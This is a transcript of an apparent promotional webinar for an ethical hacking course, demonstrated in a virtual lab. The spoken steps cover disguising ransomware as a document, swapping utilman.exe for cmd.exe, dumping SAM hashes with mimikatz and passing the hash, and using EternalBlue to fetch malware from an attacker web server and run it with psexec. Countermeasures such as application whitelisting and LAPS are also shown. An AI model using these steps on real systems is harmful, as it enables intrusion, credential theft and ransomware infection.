Okay, I'm ready. So, hello everyone. This is gonna be funny. So let me begin presenting my desktop probably. And yes. Today I will show few typical exercise from ethical hacking course. And you know, this is gonna be quick and dirty. In case you do not understand anything, you just interrupt me and ask the question. It's okay. It's completely okay. We are only like several people in here, so you can ask me the questions freely by voice. I'm gonna present you few typical exercises like ransomware attack and how to protect your computer from ransomware. And it's not like simply installing antivirus and that's it. We will also see how pass the hash attack is happening and how to protect your system from pass the hash if this is possible. And I have updated an agenda. I have added one more interesting part, and this is the demo of Eternal Blue exploit, which was utilized by WannaCry virus. So you will see how it works from inside. Okay, just a little bit. And everything of this is like how and what we are doing on the ethical hacking course. It's not like you will see everything in details, everything. I will show you what we are doing actually. Okay, and you can ask questions anyway. So let me check if there's any actual question. Yeah, we are recording the session, so you can also see it a little bit slower later. So let's begin with the very first exercise. First, the ransomware attack. I suspect you know what ransomware is, so I have prepared actually a few virtual machines, and this is how we work on the course. We have a lot of virtual machines installed, and we hack and test different tools with different virtual machines. This is not the complete pack, but I'm a little bit limited with my physical memory, so I will be unable to launch everything and show you, but it's okay for this demo. So I have, currently I have the domain controller of Windows Server 2012. We have few member servers like 2012 and 2008. We have few member workstations like Windows 8 and Windows 7, and also Kali Linux, the latest and updated Metasploit. So actually, let's begin with workstation. The workstation is ready. So this is a very typical workstation. Nothing actually is installed with the exception of Microsoft Office. This is the Office and this is it. So nothing very special. So how do you get the ransomware to your PC? There are a lot of methods. Like someone puts this executable on a file share, someone puts it on a USB stick, and you find this USB stick somewhere under the table and try to open the documents from this USB stick. It could be like email attachment or the link to some website. To make it a little bit quicker, I have copied files on my desktop. Actually, okay, what do you see on my desktop? Like few documents, okay? Let me test those documents. And to make it clear, I have enabled the file extensions. Like, let me show you the folder options, view, and you see that extensions are not hidden. So you can see extensions. And let's test the first document. This like from USB, it comes from email or something. So I'm testing the first document. Well, some documents, probably not interesting. No updates, thank you. No, it's enough. Okay, let's test the second document. Okay, some document, probably nothing interesting. Let's test the third document, and oh, my personal files are encrypted. This is how usually it happens. Okay, this is the demonstration ransomware. Actually, I have real ransomware in my pack, but I still need this workstation to be working at the moment. So can any one of you tell me what is the issue with this document? It looks like a document, okay, but it has encrypted my files. How it works like if you see this? If anyone, you can answer with voice or maybe type your response in chat. Do you see anything unusual, anything strange in this? Okay, so it's application, yeah, and let me show you how it works. Actually, it's an application. Let me rename this file. So I will magnify once again, and let me rename this file. And you see where exe.exe is. And this is way funny, isn't it? So you can fool your users. Actually, I have compiled this file myself. I have added word icon. I have screwed the file name and put .exe inside this name.exe extension. Okay, so yeah, this was really simple. Yeah, and we're gonna increase the complexity of the task step by step. So don't think everything is gonna be like that. Very simple. How to program this executable? Okay, this is what ethical hacking course is about. You will see it on your course. Yeah, if you attend the course, you will see how to do it. Actually, I'm doing it. Let me show you again, quick and dirty. On my computer, I have the Metasploit installed on this Windows 8 machine, and I have the Ruby language. Okay, and by using this language, I have renamed the executable by inserting very special Unicode characters inside. And this is how it looks like. Executive report written from the right to the left. Okay, so the actual question is how to protect your PC from this threat. This is the big rocket science, which is called application whitelisting. But let me show you in short how to do this. Okay, so I'm switching to administrator because I'm gonna configure group policy. In real environment, I'm doing it by using domain group policy, of course. But now, to just test it and show you, I will do it with my local computer policy, and this is gp-edit MSC. So to get this result, you need at least Windows Professional. And there are two really interesting policies in a PC. So one of them is called software restriction policies, which is available beginning from Windows XP and also available on all professionals. And app blocker, let me type it like app blocker, which is also called SRP version 2, and it's available beginning on Windows 7 Plus, and it requires Enterprise. So to make it a little bit more available, accessible, I will do it with software restriction policies because I know many of you run Windows Professional, not Enterprise. Okay, so I'm creating just simply default policy, and immediately I'm putting like all the software is disallowed. So this is not like traditional approach. The traditional is blacklisting when antivirus allows you to do anything, with exception of something bad. But it's not it's not guaranteed that antivirus is able to find that some particular executable is a virus. So by using this policy, I'm telling like everything is prohibited, just simply everything, with few exceptions. So I will recreate these rules to allow, say by path, to allow everything from CVNOS. CVNOS is unrestricted. It's okay. Do you know any other path which is safe by default? You probably know. This is at least program files, okay? So I'm adding new path, and this is C program files. Let me copy it. Okay, this is unrestricted. And one more path which exists on 64-bit machines, program files x86. So everything from those paths gonna work completely. So all your built-in programs, all your additional programs, everything you install under program files is gonna work. I will also update just a little bit this policy to enforce policy for all software files, including DLLs, because see, this would be quite simple, like to launch a virus by using from DLL command, and with say parameter like fdrive virus.dll. It would be too simple, yeah? So that's why I'm blocking, I'm filtering all the software files. And also I will filter all users, including administrators, because I think that an administrator is the most dangerous user on the system, okay? So all software files, all users, and okay, from designated file types, I will define what executables are. What is executable? Like this is an .exe, this is an HTA, HTML application, this is MSI. Yeah, the only thing I will remove is shortcut to make it just a little bit simpler. Okay, and I need to reboot the system for the first time, and that's it. And we will see the result. While it's rebooting, of course, it's not as simple, to implement this policy in a real environment. First, you need to collect information of what's happening in your machines. You need to collect information on what path you're using, maybe some hashes, maybe some other servers from which you launch applications. You need to collect this information. You need to query this database to find out which paths are available in your system and allowed. Yeah, and then you're gonna build really good policy. But like to make it quick and dirty, you will see. So the policy is enforced. Let me check if I can work with my standard programs. Like for instance, calculator. Where's my Paint? Okay, Paint. It works. What about Office? Word. It works. What about CMD? Does it work? Yes, it works because it's located under C Windows. Now let's navigate to my virus. So if I'm able to open the document, yes, it works, because actually this policy only limits executables, not documents. And trying to launch the malware, you will see some interesting result. So this program is blocked by group policy. So if this would be some, if it was a legitimate software, you can add it to the policy and permit it. But this one is not legitimate. And it's very typical, say when user tries to launch something from internet browser, this executable gonna be launched from temporary internet files from internet cache, and it's gonna be denied, just simply denied and blocked. When user receives something by email, he will try to open an attachment, and this attached file will be executed either from temp folder or maybe from zip folder, but not from program files or C Windows, and that's why this is going to be blocked as well. And this is quite good strategy when you block everything, simply everything, because normal users do not receive executables. Normal users do not put executables on their desktop and never launch executables from USB sticks. But documents, it's okay, quite okay. So this is very simple countermeasure, isn't it? I think it's really simple. If you have any comment, you can just type it on maybe say by voice. So it was just a little bit more complex than an attack. Yeah. If you have no questions, we will go to pass the hash. But During the course, you will learn how to configure this policy, not like in 5 minutes, say in a few hours. And you will spend some considerable time to explore all the options of this group policy. And as you might see, you don't need to install anything, just simply implement group policy and that's it. And you're secure. Okay? So if you don't have questions, I will continue to the next exercise. Yeah, well, so the question is, what if the infected file was copied to the program files? Yeah, that's simple. Let me show the first part. What program files actually is. So I'm clicking program files, properties, and security. And as you might see, users only have the read access to this folder. And that's it. Okay. There are administrators who are able to copy something, and my point of view is like nothing is able to prevent administrator from screwing up the system. This is it. He's an administrator. It's done. Actually, during the course, we learn how to overcome the policy, how to hack this policy as well. And you will see that this is possible. This is very possible. You can circumvent app locker. You can circumvent software restriction policies, yes. But say it's not like user has clicked something and got infected. No, it's not like that. The user needs to do some particular actions to overcome the policy. It's not like I have simply clicked an attachment and it's done. No, it's not like that. And of course, you never give your users the permissions of administrator. Of course. Okay, so this is it. So the next part is pass the hash attack. I will explain the issue. And the issue is, like, I don't know how many servers you run in your environment. For me, it's hundreds. I have hundreds of servers. And the challenging part is, okay, this is the domain. In a domain, let me write it like on this desktop. So this is the domain controller, the DC. And we have like hundreds of servers, or maybe tens or maybe thousands, this depends. You also have local user accounts. Yes, at least by default you have built-in administrator, isn't it? So you have some user domain database. Yeah, you have some Peter, John, Thomas somewhere in the domain, and maybe built-in administrator, maybe he's renamed, this depends. But even after joining to the domain, your servers continue running local user accounts. Some companies block that user accounts, yeah, that's it. Some companies don't, because when you lose your contact with the domain, say something is not working on the network interface card, and that's it. So what's going to be next with the server? You have lost your server? Of course not. So you log on as local administrator with local user account. And in most cases, this is like built-in administrator with some password, or maybe like this, some password, some complex password. And in most cases, you never change this password. In most cases, this password is one and the same for each and every machine. For workstations, this situation can be like that. So say you have hundreds or maybe thousands of workstations, and you have a lot of stuff in your IT support. Say I have, for instance, 10 IT support guys, and in case the network is not available, or this is the laptop which is traveling, they need to connect to this laptop and install something, or patch something, or fix something. Which user account they're gonna use? Of course, the built-in administrator or some special support account, like for instance the support with some password, or maybe something like this. Password 2, like this one. And this password is one and the same for thousands of machines, for hundreds of machines, and it never changes. So this is a very typical situation. If this is not your situation, you just tell me, okay? But what's important for ethical hacking course? This course does not teach you how to, say, protect your system. This course teaches you how to hack the system, how to find out the weak link in the system and hack through this weak link. So in most companies, this weak link is local administrator. And to provide you the illustration of this, so I will shut down the Windows 7 because I'm running out of memory. But I will show you, yeah, I will show you this actual example of local user count. So somewhere in local users I have the support account, which is the member of local administrators, and possibly you don't know this password because you want to hack it. And I will show you that you don't need to hack this password. You just can take its hash. You don't need to crack this hash, just simply use it. So okay, let's stay Windows 7, and I'm switching to Windows 2012 and 2008. So I'm running two Windows servers. This is Windows 2012 and this is Windows 2008. Two servers just simply illustrate that you have hundreds or tens or thousands of servers. And let me show you the computer management. And possibly they have some built-in administrator account, which is member of administrators, of course, and say the password never expires, of course, yes. And possibly this user account has never logged in, possibly, why not? And everyone just you don't use this account, you don't remember the password, but this account exists. So I will begin attack at Windows 2012. It doesn't really matter which operating system to use, actually. So this is Windows Server 2012. I'm booting from my compact disk, just from installation CD, that's enough. So I'm resetting this machine because I don't know the password. I'm unable to log on. I don't know which password is for administrator. I will hack it. So first I will perform some physical attack. Okay, I understand that this is some particular situation when there is some unrestricted physical access. But this is very possible that some of your servers are not protected from unrestricted physical access. It's very possible. So this is installation compact disk. I'm launching the CMD inside the installation. I'm checking the mount points. I see the C, D, X, E drives. Okay, possibly this is going to be D drive. So on D drive, what's inside? There is a Windows folder. Yeah, that's correct. I'm navigating to Windows System 32. And I will copy one Microsoft executable over some another Microsoft executable. Copy cmd.exe, cmd.exe over utilman.exe. Yes, overwrite, and you will see the result. So it's done with this cmd. It's done with the CD installation CD. Remove, and I will just reboot the machine. I still remember that somewhere in the network there is Windows 2008. Okay, maybe. So this is the 2012. I have spent like 60 seconds for physical reboot and inserting my compact disk. Okay, in case you don't have an access to the server, you have access to workstation. It is going to be the same. Okay, now I'm navigating to this icon, to this accessibility. And this is something interesting. I have the command prompt. because I have replaced the utilman.exe with this simple executable cmd.exe. Yes, so now I need to grab hashes from this machine. Okay, actually, let me show you who am I. I'm system, because this executable now works as system, and this is the consequence of unrestricted physical access. Okay, net user, and you'll see that there's administrator and guest. I need to hack the administrator account. I will do it like that. First, I will create some folder to download my very special executable to this folder. Make directory mimikatz. Very simple. Then I will execute the Internet Explorer from this session. Yes, I'm not logged in into the system. I'm just system. And then from program files, I'm opening the folder Internet Explorer, eExplorer. And this is the Internet Explorer launched from within a logon session by using system credentials. And I will download something special from my website. I will show you my website, and this is based on Kali Linux. I will log on as root with the password Tor, which is default for Kali. During the ethical hacking sessions, you will use Kali a lot, really a lot. So let me check my IP configuration, if config. Yeah, I see my IP address, that's correct. I'm launching the web server. Oh, sorry. So I have started my web server, and let me show you what's inside this server. And on this computer, var freew html, you see some mimikatz folder which I have previously prepared, and I will download mimikatz to my victim machine. Okay, so where's my victim machine? This one. HTTP, an IP address or DNS name, mimikatz, and you see the content. I will download all the files to my local disk. Come on. I want this to be downloaded. The system user profile still not prepared completely. That's why possibly it will ask you or for something, or it will take some time to save the target. Well, give me something. No, come on. Okay, it doesn't want to download like that. Why not? Mimikatz. I will do it from PowerShell. So PowerShell host, just to check it. Why not? So I have the PowerShell 4, just to inform you. Yeah, okay. So, well, what to do? PowerShell dash command, and command is invoke web request, because I have prepared for this scenario when it doesn't want to download with the browser. It's very possible. HTTP, an IP address mimikatz.exe, folder mimikatz.exe, and dash out file c mimikatz.exe. Okay, let's check it. Well, it's done. I will download all the files. There's gonna be also a few files more. I will just type the name mimilib.dll, and the source also as mimilib.dll. No. Dash out file. Yes, I understand. dash out file. Well, possibly it's done. And then one more file, mimi driver. .sys. It just simply overwrites over the command, that's why. So dash out file, see mimikatz mimi driver .sys. Okay, there. So I have downloaded all 3 files, and I can just simply launch mimikatz. This is going to be a very simple command. LSA dump SAM. I'm dumping SAM file. Well, I don't see passwords, but I see the password hash, and this is it, this one. This is the local administrator account, so I will copy paste this account. Not account, but hash. And now I will launch pass the hash attack. I don't know the password, I just have hash, but I will not crack it, I will just use it. So secure LSA, pass the hash attack, the user is administrator, the domain is localhost, and the NTLM hash is this one, which I have copied. Well, let's do it. And I have spawned one more CMD, which actually is not system anymore. This is an administrator. And to check it, okay, so my hostname is Windows 2012. Let's check if Windows 2008 is available. Well, it's available. So I am running this CMD as administrator, which possibly has one and the same password through all the servers. So net use, say kdisk ch Windows 2008 $, of course. The command has completed successfully. Okay, let's check what's on kdisk. And this is the disk of that remote machine. Okay, computer management. No. I know. It wants his working directory. Okay. This is not as simple on 2012. On 2008, this is way simple. Well, net user and the computer name ch Windows 2012 or 2008, and you can manage users or say service center to control services and so on. I will not continue because say it's enough. I have connected to the remote machine, and this is the C drive of the remote machine. Now I can download say psexec and execute something remotely. This is gonna work. To check it on 2008, I will show you the sessions, and you see that an administrator is connected from some machine remotely. So actually, pass the hash. Let me describe it once again. So you have several servers, and each and every server has the same username administrator. One and the same on all machines. I don't know which actual password is it. By using unrestricted physical access, I'm dumping SAM, I'm dumping admin hash, and I'm spawning CMD with this hash, and I have an access to all the machines which run one and the same administrator password. This is way simple. Do you have any question for pass the hash attack? Type it or tell me. I will wait for 1 minute if you have some question, and we'll continue to protection. Okay. Now, so I see no questions. Let me continue with protection from this. Oh yeah, something. It's clear, I see. Let me continue to protection from this threat. There are several ways you can do it. The first, the very simple way. Let me show you the domain controller. So this is the domain controller. I will log on as domain administrator and navigate to group policy. And say I will configure some domain configuration baseline. Yeah, this is really good place to join this policy, to link it to the root folder of the domain, and you will see why. And in computer configuration, policies, Windows settings, security settings, you have some user rights, and where you can define what users can do, something like to add workstations to the domain, to change the system time, to manage disks or something. And you need some particular policy. Oh yeah, it's not available on domain controller, so I will do it on the simple server gp edit msc, because on domain controller this group is not available. So I'm navigating to the same node under local group policy, and you see that something is pre-configured, and I will navigate to deny logon, deny access to this computer from the network. And there is new entity, new identity, which is presented in Windows 8 and also is available for Windows 7 fully patched. And this identity is called local. No, not local. It's not patched. Oh, thank you very much. So let's check the Windows 2012. No, of course, I don't have working directory. Let's do it from 2012, because my 2008 is not patched. This is very simple. So gp edit msc, computer configuration, security settings, local policy, user rights, and this is deny logon, deny access from the network. Show me something interesting. Local. Yes. And you can deny either local accounts by logging on remotely from the network, or say local accountant which is member of administrators. By using this setting, okay, someone will capture the hash of admin account. Okay, it's done, because this is the unrestricted physical access. But he will be unable to connect to your servers from the network by using this account. So do it like that. I will deploy this setting from the main group policies, of course, not just simply locally. And this is going to work. Okay, now it's cancelled because this is not actually what I want to show you. And another method is to maintain random passwords for local administrators. Random. So it's like you have few servers, and this administrator has the password like this one. This admin password, yes, different, and this admin password is completely different, like this one. The question, how would you maintain this? And the method is called Microsoft Local Admin Password Solution. This is the DLL file which is deployed to each and every machine, and it creates random passwords and keeps them in Active Directory. And let me show you how. So to show you this part, I'm going to the main controller, yes, and I will install this package. Let me download this package and install it. So this is very simple. It's deployed as MSI, so you can use group policy, scripts, or Windows Update with local packaging. You can use System Center to deploy these MSI. Now I will install just simply manually to show you what's inside. Yes, and on this PC I will install not this one, which actually is this DLL, but management tools. Yes, the management tools on the main controller, because I will not change the local admin password on the main controller. The main controller doesn't have local accounts. Okay, so I'm installing this. Yes, I will also deploy this DLL to my Windows servers. I don't have System Center in here, that's why I will do it manually. Okay, so let me publish this executable, my netlogon share, and then I will install it on my servers. Yes, I accept, simply as default. Yeah, it's done in 2008 as well. Yes, I agree. So I have installed management tools on the main controller and the DLL itself on each and every Windows server, or also workstations. Say in our real environment we run labs on each and every machine with the exception of the main controllers. So now how do you manage this? Okay. First, I need few PowerShell tricks to register this Active Directory extension. So I will use the commands, few commands. I will type it from my paper. Import module admin.ps. Okay. Now I will update Active Directory schema. This is important. Yeah. Update admin password AD schema. I have logged on as enterprise administrator and schema administrator, of course. So now I will create some special group of users who will be able to see local administrator passwords. So I am navigating to Active Directory user and computers. Oops. In my domain, okay, new organizational unit, which is groups. Under groups, new group, AD labs managers. Let be domain local group. Okay, so I have some special group, and this group will be permitted to read and access local administrator passwords from Active Directory. Okay, now I will continue typing a few commands. So I will tell my Active Directory that computers are permitted to update their passwords. So this is gonna be like set admin put no self permission, yes, -org unit, and you see the structure of my Active Directory. I have workstations under workstations, OU, servers under servers OU, and then under company and then domain root. So I will type this distinguished name. So OU is computers, not computers, servers, because I have not installed this DLL on computers yet. OU is Windows NT, DC Windows, DC LV. Sales permissions. Come on. This may take some time. While it does it, I will configure group policy. So which one is going? Okay, in this scenario, this is going to be domain configuration baseline. And in policies, administrative templates, now you see something interesting appeared. And this is labs section. And here I can configure password settings. First, enable password management. Yes, I will enable it for all the domain. Yes. And which name of administrator? Say on built-in administrator, you don't need to change it. For some workstations, you need to type like support or something what you have. And password setting, you can define the password complexity. Okay, say this is going to be 8 characters, and it's going to be like without special characters. Why not? Just simply capitals, small letters, and numbers. This is good. And I will force password change every 30 days. Yeah, that's correct. Okay. No. Why not? No, why not? Why not? Let me check it. This is some little fail. In my active directory, I have servers Windows NT.lv. Servers Windows NT. Ah, yes, that's correct. Now it's done. So the group policy exists. Executable is deployed. I will perform GP update on my servers. GP update. GP update. The schema is extended. Okay, let me reboot the machine. This can be useful. And then I will check with domain controller if something has changed in computer accounts. So again, Active Directory users and computers. I will navigate to Windows NT servers, view advanced features. Yes. I will call for attribute editor, and now you see the result. This is the password of local admin account on that Windows Server 2012. Also use some easier way like labs. Show me something on labs. Yes, this one. This program can be used to access local admin password quickly, like CH Windows 2008 search. And now you see the password of local admin. You can copy paste it and use to log on to that machine. And you see the expiration date. And how it works with laptops is even funnier. So the user calls you, like he's unable to connect to network and he needs to install something very quickly or reconfigure. You can request his laptop's local admin password from Active Directory and tell him this password and set like expiration date tomorrow. And the user will log on as local administrator, will perform all the tasks required, and that's it. And the password is going to be changed on the next day. And this is unique password for each and every PC. Now, do you have questions on labs? So this is really highly recommended thing throughout the domain. If you have local administrator password, of course. Okay, so I'm waiting for questions, if any, and then we can continue to the next exercise. So I'm waiting for comment or question. Yeah, really. I'm using it in all my domains. You will learn more on the course anyway. Okay. Before we go to the next exercise, which is WannaCry attack, actually Eternal Blue attack, I will show you some part of the course how it looks like. You probably want to know. So I will open a few PDF files. So on my PC I have a few PDF files on that. How the courseware looks like for instance SQL injection maybe. As the part of the course, you will receive protected documents, protected PDFs, and encrypted with digital certificate. I will use my personal account to encrypt this document. So this module looks like the following. I will scroll down slowly for you to be able to see, or maybe directly to some page 50 for instance. And you see the typical pages, slides with commands or explanations and a lot of text explanation. They teach you how to use, for instance, SQL injection attack, which characters to use, how to perform database enumeration, and so on, and the differences between Oracle attack and MySQL attack. And they will also ask you on exam the differences. So quite useful material with commands and examples. And also they have labs. Let me show you some lab. Like lab manuals for sniffing, for instance. I will scroll down by pages, and then they will, for instance, teach you how to use Wireshark to sniff passwords. And they'll tell you, download Wireshark, launch the following executable, and click the following command. Set up the following filter and use the following exercise. So, and analyze traffic like that. It's quite possible on exam they will present you like the screenshot of the Wireshark and ask you to describe what's happening on this capture. So this is how it looks like for this exercise, for instance. Am I scrolling too fast? No. Do you see the content? I will close it. Okay. So now we can begin with the last exercise, and I will use Metasploit, and I will teach you how to execute the Eternal Blue attack. To do this, we need the Kali, and this Kali is running updated Metasploit. Let me show you. So I will launch MSF console, which is Metasploit console. And also I need some victim, and this victim gonna be, say, the same 2008. Why not? I will log on to show you that user will see nothing really special with it. So let the user work within this 2008. Yeah, the only thing I need to know the IP address to attack. Usually, say during the course, you will learn how to scan the network, how to figure out where is which operating system, and how to scan ports. But to make it quicker, I'm just typing ipconfig and see an IP address of this one. Okay, that's cool. So I will execute the following exploit. Use exploit. This exploit is for Windows, for SMB protocol, and this vulnerability is MS17 Eternal Blue. Yes, that's it. From all the options, the only thing I need to configure is remote host. So set rhost and IP address of Windows 2008. So this is the IP address of my victim exploit. This is way quickly, isn't it? I'm inside that Windows 2008 host name. IMCH Windows 2008. I'm inside this machine. So I have downloaded the Ruby module from, say, GitHub, for instance, and have updated my Metasploit with this exploit. Okay, so 2008 is not patched, and user still sees nothing really special, but I'm inside. Who am I? I'm the system, because as you might know, this exploit is inside the SMB component, which works under system privileges. So I'm running system inside that remote machine. Well, let me check the PowerShell version. No. PowerShell host. Okay, I see the PowerShell version 4. That's correct. I needed to download executables to download my wires, so I will do it like that. PowerShell and the command to get, which is invoke web request. Oh, no. This is dash command. Let it be like that. Get and which executable. I have prepared executable malware, ransomware on my PC. Okay, so HTTP, and this is my Linux machine. Virus.exe, dash out file, C Windows virus.exe. It will work. I have tested. Yes, it has downloaded the virus.exe. Let me check. Dir virus.exe. It is. So the actual question is okay. Okay, still 5 minutes actually, maybe 10. So I have exploited the vulnerability. I have downloaded my wires. Now I want to execute these wires. If I simply execute these wires, this is not as interesting. The user will see nothing. So I will use psexec from sysinternals.com. So I will execute the following command: PowerShell, and command is wget https live sysinternals.com. Do you know what sysinternals.com is? This is the paradise for hackers, actually. They have a lot of interesting utilities, and for administration, of course, and you can utilize them for hacking. So I'm downloading psexec.exe and will put it -out file to C Windows psexec.exe. Yeah, that's correct. It now connects to sysinternals.com and download this executable. So I will expect it to work. Yes. So I have few executables. Okay. *.exe, and one of them is psexec, another one is wires. Now let me request the session of this user, Quinsta. I see that user Peter is running the session ID 1, so I will put something into his session. Let me do it like that. I will split windows like this one and this one. Now you see that the peer still sees nothing. Yeah. Now I'm executing remotely on that hacked machine. psexec, do not wait, interactive session 1, C Windows, virus.exe. And now it's done. He is hacked and all the documents are encrypted. So was it too hard to execute this exploit? Of course, you will learn it on the course, of course. Now, actually, all the exercises are done. I'm waiting for your comments on this last exercise, just in case. Okay, waiting for your question. If exploit already patched. Of course, yes. You can check it from Kali because it has auxiliary module which checks for vulnerability. You can say create a batch within Kali and Metasploit will check all the subnet to see if you have some unpatched machine. You will see it on the course. But actually, I'm running my own Windows Update services, and I'm checking from Windows Update server, actually. Yeah. So, Miroslav, you here? I have finished my part. I have presented you what we are actually doing on the course. I have presented you the document from the course, the training material and the labs. And I want to add that this course is very intensive, really intensive and requiring. So, but it's designed for beginners, for hacking beginners, of course. So you can learn a lot. Yeah, I will be the trainer. Yes.
Okay, I'm here.
Yeah, okay, so I'm stopping my screen. I'm
Thank
stopping
you.
presentation. How do you stop it? I don't know. Hyperview, no, stop presenting. Yeah, it's done. And during classes, we do all the exercises ourselves. It's not like trainers present something and it's done. No. Each and every student is required to do the same, and I will explain everything. And this is, in most cases, this is my very experience. Like I have prepared the plan, and we will go with my plan. And of course, in addition, you will have an official course, and we'll do both, my exercise and their exercise. This works like that. And this is gonna be really funny, and I promise you that under the course you will say, oh my gosh, the world is crazy. I'll tell you.
Absolutely. Thank you, Peter. Okay, guys, it is quite late, and I promise I will be very short, and we will contact you tomorrow and a few next days, and I hope that we will have chance to discuss more deeply about what's your plan with this way of your professional development. But what I wanted to tell you that this was, we tried to present you very hot samples of hacking attacks, ransomware, WannaCry, and the hash, and it was rather simplified, quick and dirty executions, and the more detailed ones and the more systematic ones are presented during 40-hour hands-on ethical hacking training, of course, and there is much more time to discuss about all details and questions. Uh, first of all, I would like to tell you that we have scheduled classroom training led by Peter, and the date is June 1923 in Praha, and all of you are welcome to attend. What we are providing, it is official EC Council session, so as such, there is a standard official CEH student kit stuff. Number one, it is official training stuff, courseware, special design slides, more than 2,000 slides, more than 140 labs, and more than 2,200 hacking tools. So that means very, very, very exhaustive and large student stuff, and everything is official from EC Council. Second is hacking in security reference materials and other tons of materials. And third, it is exam voucher. Exam voucher is included within this student kit stuff. And what we are providing about, because this is what all authorized training centers are providing when delivering official training, what we are providing about this is first, informal networking. We used to organize on Wednesday, just after their session is finishing, to go to famous Prague pub and to organize informal info security networking. You have opportunity or chance to meet Peter and me and other guys in the classroom and discuss in informal way everything you can imagine. What is important, that beer and dinner is complementary. So first, second, about standard student kit is we are providing training receipt. That means that you can enroll for one more official ethical hacking training in the future, and it is free for you. And third, and pre-last, is we are providing you, we call this private hacking labs. What does it mean? In the classroom, you will learn how to execute hacker attacks, some samples and, and labs. And after a session, we provide you your own private hacking labs, meaning USB disk with virtual machines, and you can continue post-class practicing at home. I think it is cool. What do you mean?
Be careful. Your USB disk possibly may be replaced with rubber ducky.
And last one, we are providing discount for groups. If your organization are able to enroll 3 or more guys, you can earn 33% discount. So I think that it is those 4 benefits above standard benefits. That is what we are providing you. And of course, Peter, as instructor, you know very well that training and qualities are different, mainly because of instructors. So we are providing excellent instructor and those 4 benefits. And it's up to you. But what I think that don't wait for, and also can grab your raise. That's all from my side. I promise to be very short. Do you have any questions, or would you like to ask something? When we are waiting for your questions, please be informed once more that we prepare a report. We made a recording of this session. We prepare and send you a link to record. And you will have a chance, if you want, to go through this session once more. And we will contact you with those information, and hopefully we'll have a chance to meet you at New Horizons in Prague in time of CEH training delivery. Is anybody here who know that or want to enroll for upcoming training? Just put yes or no.
There's a question from student. He wants the discount for single student. Yeah.
Thank you for a question. Yes, we can discuss about discount for individual students as well. Yes, we are open for discounts.
For discussion.
And, yes, I am owner of New Horizons, so I have no boss, so I can decide and discuss with you, help us. Maybe not 33%, but very attractive discount. Any questions?
Thank you as well. Maybe you will have a chance to get familiar with this in some way.
Hack 5.
Yeah.
What is Hack 5?
This is the package of rubber ducky, of
I see.
land turtle, and so on.
I see.
Highly recommended for penetration testers.
I see.
Okay, I have no questions.
It seems that no questions are coming.
Yeah.
Thank you very much for joining this session, and thank you, Peter, for your for your input, valuable input. I think that I'm not technical guy. I think that it was interesting, and I'm looking forward to welcome you at our next webinars, and possibly personally at New Horizons Praha in June, when we will deliver CEH training. Thank you and enjoy the rest of the day. Bye-bye.